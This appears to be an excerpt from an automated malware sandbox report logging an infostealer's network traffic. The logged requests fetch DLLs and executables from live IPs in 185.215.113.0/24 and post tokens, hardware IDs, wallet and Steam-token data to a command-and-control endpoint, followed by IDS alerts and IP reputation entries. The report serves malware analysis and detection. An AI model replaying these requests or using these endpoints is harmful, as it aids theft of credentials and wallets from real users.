Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKHost: 185.215.113.206Content-Length: 8443Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDBFCBGDBKKECBFCGIEHost: 185.215.113.206Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAEGHIJEHJDHIDHIDAEHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 2d 2d 0d 0a Data Ascii: ------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="file"------BFHJJJDAFBKEBGDGHCGD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECFBAAAFHIIDGCGCBFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 2d 2d 0d 0a Data Ascii: ------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="file"------FIECFBAAAFHIIDGCGCBF--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 43 37 36 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42C76B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDGHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="message"wallets------CAKFIJDHJEGIDHJKKKJJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECBAKFBGDGCBGDBAECHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 42 41 4b 46 42 47 44 47 43 42 47 44 42 41 45 43 2d 2d 0d 0a Data Ascii: ------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------BKECBAKFBGDGCBGDBAECContent-Disposition: form-data; name="message"files------BKECBAKFBGDGCBGDBAEC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="file"------EHJDHJKFIECAAKFIJJKJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJKHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="message"ybncbhylepme------CGIEGHJEGHJKFIEBFHJK--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 36 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001605001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIIIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 34 38 30 38 63 36 63 63 31 38 35 34 35 63 66 66 35 34 31 62 39 38 32 32 39 38 30 37 33 37 39 38 63 62 64 38 61 33 66 33 39 35 39 63 65 61 31 30 63 36 39 34 35 62 34 33 36 37 38 30 38 37 33 62 66 64 65 31 36 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 2d 2d 0d 0a Data Ascii: ------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="token"e24808c6cc18545cff541b982298073798cbd8a3f3959cea10c6945b436780873bfde16b------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GHIDGDHCGCBAKFHIIIII--
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 36 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001606001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 38 46 30 38 41 31 36 43 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 48 43 41 4b 4b 46 42 47 44 48 4a 4a 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="hwid"AE8F08A16C9A291931458------CBGHCAKKFBGDHJJJKECFContent-Disposition: form-data; name="build"puma------CBGHCAKKFBGDHJJJKECF--
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 36 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001607001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 36 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001608001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFBFCBGHDGCFHJJECAFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 45 38 46 30 38 41 31 36 43 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 42 46 43 42 47 48 44 47 43 46 48 4a 4a 45 43 41 46 2d 2d 0d 0a Data Ascii: ------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="hwid"AE8F08A16C9A291931458------BAFBFCBGHDGCFHJJECAFContent-Disposition: form-data; name="build"puma------BAFBFCBGHDGCFHJJECAF--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 43 37 36 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42C76B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 43 37 36 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42C76B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49745 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49803 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49742 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49921 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50011 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50039 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50039 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50027 -> 185.215.113.16:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
